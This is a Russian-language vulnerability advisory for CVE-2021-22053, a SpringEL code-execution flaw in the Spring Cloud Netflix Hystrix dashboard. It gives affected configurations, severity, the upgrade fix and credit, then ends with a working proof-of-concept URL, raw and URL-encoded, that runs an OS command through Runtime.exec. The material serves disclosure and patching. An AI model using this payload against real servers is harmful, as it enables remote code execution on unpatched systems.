
Уязвимость разрешения шаблонов панели мониторинга Hystrix в Spring Cloud Netflix CVE-2021-22053
Высокая
Spring от VMware
Приложения, использующие как spring-cloud-netflix-hystrix-dashboard, так и spring-boot-starter-thymeleaf, предоставляют способ выполнения кода, переданного в пути URI запроса во время разрешения шаблонов представлений. Когда запрос отправлен на /hystrix/monitor;[пользовательские данные], элементы пути после hystrix/monitor оцениваются как выражения SpringEL, что может привести к выполнению кода.
Степень серьезности высокая, если не указано иное.
Пользователям затронутых версий следует применить следующее устранение: пользователям следует обновиться до 2.2.10.RELEASE+. Никаких других действий не требуется. Релизы, в которых эта проблема исправлена, включают:
Эта уязвимость была выявлена и ответственно сообщена threedr3am из лаборатории безопасности SecCoder ([email protected]).
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
2021-11-17: Опубликован первоначальный отчет об уязвимости.
raw:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
encode:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. Символ косой черты '/' не может быть передан в команде.